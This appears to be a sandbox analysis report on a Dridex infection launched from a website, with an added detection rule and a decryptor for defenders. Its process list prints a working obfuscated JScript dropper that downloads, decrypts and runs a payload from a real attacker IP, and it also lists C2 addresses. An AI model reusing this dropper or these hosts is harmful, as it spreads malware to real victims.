Overview

Overall score: 10

Tasks and per-task scores (in the order the report lists them):
  http://hillmag.xyz/   windows7_x64    score: -
  http://hillmag.xyz/   windows7_x64    score: 1
  http://hillmag.xyz/   windows7_x64    score: 6
  http://hillmag.xyz/   windows10_x64   score: 1
  http://hillmag.xyz/   windows10_x64   score: 10
  http://hillmag.xyz/   windows10_x64   score: 10
  http://hillmag.xyz/   windows10_x64   score: 10
  http://hillmag.xyz/   linux_amd64     score: 10
Analysis
  max time kernel:  148s
  max time network: 151s
  platform:         windows10_x64
  resource:         win10-en-20210920
  submitted:        30-09-2021 23:52
Static task:  static1
URLScan task: urlscan1
  Sample: http://hillmag.xyz/

Behavioral tasks (sample http://hillmag.xyz/ in every task):
  behavioral1: win7-ja-20210920
  behavioral2: win7v20210408
  behavioral3: win7-de-20210920
  behavioral4: win10v20210408
  behavioral5: win10-ja-20210920
  behavioral6: win10-en-20210920
  behavioral7: win10-de-20210920
  behavioral8: ubuntu-amd64
General

Malware Config (extracted)
  Family: dridex
  Botnet ID: 10111
  C2:
    185.168.130.138:443
    79.172.255.198:9676
    195.154.108.109:10172
Signatures

Blocklisted process makes network request (1 IoC)
  flow 17, pid 1116, wscript.exe

Executes dropped EXE (1 IoC)
  pid 2936, d5krb.exe

Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled (1 TTP)
  Key value queried by d5krb.exe: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies Internet Explorer settings (1 TTP)
  Registry activity by iexplore.exe / IEXPLORE.EXE. All paths below are relative to
  \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer:
    Key created       Main                                                        iexplore.exe
    Set value (str)   Main\FullScreen = "no"                                      iexplore.exe
    Set value (int)   VersionManager\LastTTLHighDateTime = "50"                   iexplore.exe
    Set value (int)   VersionManager\LastCheckForUpdateHighDateTime = "30914134"  IEXPLORE.EXE
    Set value (data)  FlipAhead\Meta\generator$WordPress                          iexplore.exe
    Set value (int)   FlipAhead\FileVersion = "2016061511"                        iexplore.exe
    Set value (int)   HistoryJournalCertificate\NextUpdateDate = "339827560"      iexplore.exe
    Set value (data)  Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000  iexplore.exe
    Set value (int)   DomainSuggestion\NextUpdateDate = "339810966"               iexplore.exe
    Key created       HistoryJournalCertificate                                   iexplore.exe
    Key created       FlipAhead                                                   iexplore.exe
    Set value (data)  FlipAhead\Meta\generator$http://www.typepad.com/            iexplore.exe
    Set value (int)   Recovery\PendingRecovery\AdminActive = "0"                  iexplore.exe
    Key created       Main                                                        IEXPLORE.EXE
    Set value (int)   VersionManager\LastCheckForUpdateLowDateTime = "1721350154" IEXPLORE.EXE
    Key created       DomainSuggestion\FileNames                                  iexplore.exe
    Set value (str)   DomainSuggestion\FileNames\en-US = "en-US.1"                iexplore.exe
    Key created       FlipAhead\Meta                                              iexplore.exe
    Set value (data)  FlipAhead\Meta\generator$Discuz!                            iexplore.exe
    Set value (int)   FlipAhead\NextUpdateDate = "339859552"                      iexplore.exe
    Set value (int)   Main\CompatibilityFlags = "0"                               iexplore.exe
    Key created       VersionManager                                              iexplore.exe
    Set value (int)   VersionManager\LastCheckForUpdateLowDateTime = "1699161273" iexplore.exe
    Key created       DomainSuggestion\FileNames\                                 iexplore.exe
    Key created       DomainSuggestion                                            iexplore.exe
    Set value (data)  FlipAhead\Meta\generator$blogger                            iexplore.exe
    Key created       Recovery\AdminActive                                        iexplore.exe
    Set value (str)   Main\WindowsSearch\Version = "WS not running"               iexplore.exe
    Key created       Recovery\PendingRecovery                                    iexplore.exe
    Set value (data)  FlipAhead\Meta\generator$MediaWiki                          iexplore.exe
    Set value (data)  FlipAhead\Meta\generator$vBulletin 3                        iexplore.exe
    Set value (int)   Recovery\AdminActive\{907F5CA8-2249-11EC-AF2E-EE29200C20B6} = "0"  iexplore.exe
    Set value (int)   VersionManager\LastUpdateLowDateTime = "1699161273"         iexplore.exe
    Set value (int)   VersionManager\LastUpdateHighDateTime = "30914134"          iexplore.exe
    Set value (int)   VersionManager\LastTTLLowDateTime = "1251635200"            iexplore.exe
    Set value (int)   VersionManager\LastCheckForUpdateHighDateTime = "30914134"  iexplore.exe
    Key created       VersionManager                                              IEXPLORE.EXE
    Key created       Main\WindowsSearch                                          iexplore.exe
    Set value (data)  FlipAhead\Meta\generator$Telligent                          iexplore.exe
    Set value (data)  FlipAhead\Meta\generator$vBulletin 4                        iexplore.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid 2428, iexplore.exe

Suspicious use of FindShellTrayWindow (1 IoC)
  pid 2428, iexplore.exe

Suspicious use of SetWindowsHookEx (6 IoCs)
  pid 2428 iexplore.exe (2 hits); pid 2736 IEXPLORE.EXE (4 hits)

Suspicious use of WriteProcessMemory (15 IoCs)
  Each parent/child pair below is recorded three times:
  PID 2428 iexplore.exe   wrote to memory of PID 2736 IEXPLORE.EXE
  PID 2736 IEXPLORE.EXE   wrote to memory of PID 584  cmd.exe
  PID 584  cmd.exe        wrote to memory of PID 1116 wscript.exe
  PID 1116 wscript.exe    wrote to memory of PID 1216 cmd.exe
  PID 1216 cmd.exe        wrote to memory of PID 2936 d5krb.exe
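The WriteProcessMemory IoCs above are, in effect, a parent/child map of the whole infection chain: browser, then cmd.exe, then wscript.exe forced to run a .tMp file as JScript, then cmd.exe again, then an executable dropped in the user's Temp directory. The following Python is an added example written for this page, not part of the sandbox report or of any vendor's detection content: it rebuilds that tree from process-creation events and flags the two links in the chain that are cheap to detect. The event list is constructed from the PIDs, images and command lines shown in this report (command lines abridged), and the browser and script-host name sets are assumptions you would tune for your own environment.

```python
"""Added example, not part of the sandbox report: rebuilds the parent/child
chain recorded by the WriteProcessMemory IoCs and flags the pattern
browser -> cmd.exe -> wscript.exe (//E:JScript on a non-script file) -> cmd.exe
-> executable in %TEMP%. Events are constructed from this report's PIDs,
images and command lines; the long command lines are abridged."""
import re

# Constructed process-creation events (pid, ppid, image, cmdline) mirroring the report.
EVENTS = [
    {"pid": 2428, "ppid": 0, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": r'"C:\Program Files\Internet Explorer\iexplore.exe" http://hillmag.xyz/'},
    {"pid": 2736, "ppid": 2428, "image": r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE",
     "cmdline": r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2428 CREDAT:82945 /prefetch:2'},
    {"pid": 584, "ppid": 2736, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd.exe /q /c cd /d "%tmp%" && echo function O(l){...}>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?..." "2"'},
    {"pid": 1116, "ppid": 584, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?..." "2"'},
    {"pid": 1216, "ppid": 1116, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c d5krb.exe'},
    {"pid": 2936, "ppid": 1216, "image": r"C:\Users\Admin\AppData\Local\Temp\d5krb.exe",
     "cmdline": "d5krb.exe"},
]

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}   # assumption: tune for your estate
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")
ENGINE_OVERRIDE = re.compile(r"//E:(\w+)\s+(\S+)", re.IGNORECASE)   # wscript //E:<engine> <file>


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(by_pid, pid):
    """Process record for pid, then its parent, grandparent, ... (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def find_script_dropper_chain(events):
    """Return (rule, pid, detail) tuples for processes matching the dropper chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        names = [basename(x["image"]) for x in ancestors(by_pid, e["pid"])]
        me, lineage = names[0], set(names[1:])
        # Rule 1: a script host told which engine to use (//E:) for a file whose
        # extension would not normally be run as script, with a browser upstream.
        if me in SCRIPT_HOSTS:
            m = ENGINE_OVERRIDE.search(e["cmdline"])
            if m and not m.group(2).lower().endswith(SCRIPT_EXTS) and lineage & BROWSERS:
                alerts.append(("script_host_engine_override", e["pid"], m.group(2)))
        # Rule 2: an executable under the user's Temp directory whose lineage
        # contains a script host (the dropped d5krb.exe in this report).
        if "\\appdata\\local\\temp\\" in e["image"].lower() and lineage & SCRIPT_HOSTS:
            alerts.append(("temp_exe_spawned_by_script_host", e["pid"], me))
    return alerts


if __name__ == "__main__":
    for alert in find_script_dropper_chain(EVENTS):
        print(alert)
```

Both rules key on the lineage rather than on the file name, so the random five-character name the script picks for the dropped file (d5krb in this run) does not matter; what matters is that wscript.exe was handed a file with no script extension and an explicit engine, and that something it spawned ran out of Temp.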
Processes

1. C:\Program Files\Internet Explorer\iexplore.exe  (PID 2428)
   Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://hillmag.xyz/
   - Modifies Internet Explorer settings
   - Suspicious behavior: GetForegroundWindowSpam
   - Suspicious use of FindShellTrayWindow
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

  2. C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE  (PID 2736)
     Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2428 CREDAT:82945 /prefetch:2
     - Modifies Internet Explorer settings
     - Suspicious use of SetWindowsHookEx
     - Suspicious use of WriteProcessMemory

    3. C:\Windows\SysWOW64\cmd.exe  (PID 584)
       Command line: cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?Mzg3NjI=&rpuEpV&dsfdffg43t=6NbP0zYA0SD2I3fz-3ORZzxOWPPk7DPRAOzrl6CelXXpvAkfrsCOwHp2EGILgQznYpZBFlA96n830KHyB-Z0ZaGrhCFUQhN-KLIVLI46A&cxssdvxcv=84ybobs.77zb57.406u6s2j6&sdfsdfdfg=community&ogfgafgn4=w33QMvXcJx7QFYPJKfjcT&fhfghddfsdf=twix&yKPqFawWdMjEwMjU=" "2"
       - Suspicious use of WriteProcessMemory

      4. C:\Windows\SysWOW64\wscript.exe  (PID 1116)
         Command line: wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?Mzg3NjI=&rpuEpV&dsfdffg43t=6NbP0zYA0SD2I3fz-3ORZzxOWPPk7DPRAOzrl6CelXXpvAkfrsCOwHp2EGILgQznYpZBFlA96n830KHyB-Z0ZaGrhCFUQhN-KLIVLI46A&cxssdvxcv=84ybobs.77zb57.406u6s2j6&sdfsdfdfg=community&ogfgafgn4=w33QMvXcJx7QFYPJKfjcT&fhfghddfsdf=twix&yKPqFawWdMjEwMjU=" "2"
         - Blocklisted process makes network request
         - Suspicious use of WriteProcessMemory

        5. C:\Windows\SysWOW64\cmd.exe  (PID 1216)
           Command line: "C:\Windows\System32\cmd.exe" /c d5krb.exe
           - Suspicious use of WriteProcessMemory

          6. C:\Users\Admin\AppData\Local\Temp\d5krb.exe  (PID 2936)
             Command line: d5krb.exe
             - Executes dropped EXE
             - Checks whether UAC is enabled
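The cmd.exe command line at depth 3 writes a JScript stage to 3.tMp and starts it with three arguments: argument 0 ("hX1ZytEytd") is an RC4 key, argument 1 is the download URL, and argument 2 ("2") is set as WinHttpRequest option 0, the User-Agent string. The script fetches the URL, RC4-decrypts the body with the key (the function named `_` is a textbook RC4 key schedule and keystream XOR), reads the byte at octal 027 = 23 past the "PE\x00\x00" signature (the high byte of IMAGE_FILE_HEADER.Characteristics), and if that byte is above 31 saves the result as a .dll and runs it through `regsvr32 /s`, otherwise saves it as a .exe and runs it directly; afterwards it deletes itself. The Python below is an added example written for this page, not code from the report or from the malware: it re-implements that decrypt-and-classify logic so a captured response body can be turned back into the second stage offline. No real response is on this page, so the block builds a constructed minimal PE header, encrypts it under the captured key and decrypts it again; the `d5krb` file stem and the `build_pe_stub` helper are constructed for the demonstration. It also shows the precise IMAGE_FILE_DLL test beside the dropper's loose high-byte heuristic, which would also send a file with only the 0x4000 or 0x8000 flags set down the regsvr32 path.

```python
"""Added example, not code from the report: re-implements the decrypt-and-run
logic of the JScript stage embedded in the cmd.exe command line above, so a
captured HTTP response can be turned back into the second stage offline.
Key, URL and User-Agent come from the script's three arguments; the response
body, the file stem and the PE stub are constructed here."""
import struct

PE_SIG = b"PE\x00\x00"
IMAGE_FILE_DLL = 0x2000


def rc4(data, key):
    """Plain RC4; this is exactly the dropper's _(k, e): key schedule over the
    argument-0 key, then XOR of the response body with the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def dropper_thinks_dll(payload):
    """The script's test: d = v.charCodeAt(027 + v.indexOf("PE\\x00\\x00")).
    027 is octal 23, i.e. the high byte of IMAGE_FILE_HEADER.Characteristics
    (offset 22 after the PE signature); 31 < d selects the regsvr32 branch."""
    idx = payload.find(PE_SIG) + 0o27          # find() is -1 when absent, like indexOf
    if idx >= len(payload):                    # charCodeAt past the end is NaN; 31 < NaN is false
        return False
    return payload[idx] > 31


def pe_is_dll(payload):
    """Exact check of the IMAGE_FILE_DLL bit, to show where the dropper's
    high-byte heuristic diverges (0x4000 / 0x8000 also satisfy d > 31)."""
    off = payload.find(PE_SIG)
    if off < 0 or off + 24 > len(payload):
        return False
    (characteristics,) = struct.unpack_from("<H", payload, off + 22)
    return bool(characteristics & IMAGE_FILE_DLL)


def launch_command(payload, stem):
    """What the script hands to cmd.exe /c after saving <stem>.dll or <stem>.exe
    (the stem is a random 5-character name in the script; d5krb in this run)."""
    if dropper_thinks_dll(payload):
        return "regsvr32.exe /s " + stem + ".dll"
    return stem + ".exe"


def build_pe_stub(characteristics):
    """Constructed minimal MZ/PE header, not a real sample: e_lfanew at 0x3c points
    to a PE signature at 0x40 followed by a 20-byte IMAGE_FILE_HEADER."""
    dos_header = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, characteristics)
    return dos_header + PE_SIG + file_header


def recover_payload(response_body, key, stem="d5krb"):
    """Decrypt a captured response with the argument-0 key (the script reads the
    body as iso-8859-1, so one character is one byte) and report what would run."""
    plain = rc4(response_body, key.encode("latin-1"))
    return plain, launch_command(plain, stem)


KEY = "hX1ZytEytd"   # argument 0 in the captured wscript command line

if __name__ == "__main__":
    # A DLL, a plain EXE, and a non-DLL flag combination that still trips the heuristic.
    for flags in (0x2102, 0x0102, 0x4102):
        stub = build_pe_stub(flags)
        plain, cmd = recover_payload(rc4(stub, KEY.encode()), KEY)
        print(hex(flags), "real DLL:", pe_is_dll(plain), "->", cmd)
```

To use this on a real capture, pass the raw response body (bytes, not a decoded string) and the key from the wscript command line to `recover_payload`; the first return value is the file the dropper would have written to %TEMP%, and the second is the command it would have run.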
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  MD5:    d302a1fb716166b280c2accd4491966e
  SHA1:   9eff2394f8616a4567f3eb895747ddf81fa68207
  SHA256: ce29369602f384184b8fc7be24fa322fe70da4590f73921eada2cf12774a4afc
  SHA512: c2b90c30f558518426cd0135a06dfc7d1c986635a9effffa34af80a8adaf566002d17288409b838452510212f774f5b75f2772e4acc20d7b19ad6f99751dc9ea

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  MD5:    7f2382cbe0c2807fc0f4c359d350836d
  SHA1:   37d874f1f5a782a383ad9d35c6d97401d63d334e
  SHA256: 93a1d9c56ce2845275a92d89930f534032bf4ad4b6eb4bada59c7930789b1e7d
  SHA512: d437f652e45bc7d9e2a20f38fcbec58624c0d552953a183895a84ba4f2b882173020029f54743f4bebbc75346661896e7a5cc4a76fa19099092bdc0aa9103656

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\JY06HFGL.cookie
  MD5:    536e62b4a847388ea66c5179a64b9f40
  SHA1:   123174e3b4fbf2ddc61b5b7e75fdfa5a9718d71d
  SHA256: b6023daa49c64846b0284a976e0c88f0381ba13b09458f3fa5794c32ff5a76c6
  SHA512: 7ec8750178dcdfecac122ee396c55c00a6f512232e7080e889434db4c6ec2ff5abffc2b8c2c0a91aac7409f0b2887c0d1f38bd4c04b70aa2f803f8f4df835b0d

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LPO196OT.cookie
  MD5:    481274988af7cdcaee286221d6a61b12
  SHA1:   5dfac1a490127353a5929ecc747b1000f31967db
  SHA256: c6310be473aef7d3b06e0c4c2eb3a30e5f7df96b6d07edaaecd2c141c9eb5577
  SHA512: fa21fd6171c875a1dfd2ce4f77fce9a3c0dfaa0c6a91680296728fa599090a9cc81ccd0a9dcff0236aab3e86cc4644b306e74952518b2b0a917c8945612c19d8

C:\Users\Admin\AppData\Local\Temp\3.tMp
  MD5:    60fc00422b399db85f87d41b8328976d
  SHA1:   bb85034acad8025f97e5bb236443debaf8926e4b
  SHA256: c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
  SHA512: 16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

C:\Users\Admin\AppData\Local\Temp\d5krb.exe
  MD5:    f2732682a214f0598ceaf44cc0ed346c
  SHA1:   e05362dd29050def13a63018583dd55c0cb26709
  SHA256: 724532730fb3e786ce24b914f31165be171991283bcc5b550c8d4df9da786e1c
  SHA512: 4061e6510259db25fc08b0c7799668f963f4afb21145840ad34d92b32a064238a2f57b08981c85b0a804f77b4dea7872091705f17f36a2486882a689d3daaab6
memory/584-117-0x0000000000000000-mapping.dmp
memory/1116-118-0x0000000000000000-mapping.dmp
memory/1216-120-0x0000000000000000-mapping.dmp
memory/2428-115-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp   Filesize: 428KB
memory/2736-116-0x0000000000000000-mapping.dmp
memory/2936-121-0x0000000000000000-mapping.dmp
memory/2936-124-0x0000000000500000-0x000000000064A000-memory.dmp   Filesize: 1.3MB
memory/2936-125-0x0000000000400000-0x00000000004F9000-memory.dmp   Filesize: 996KB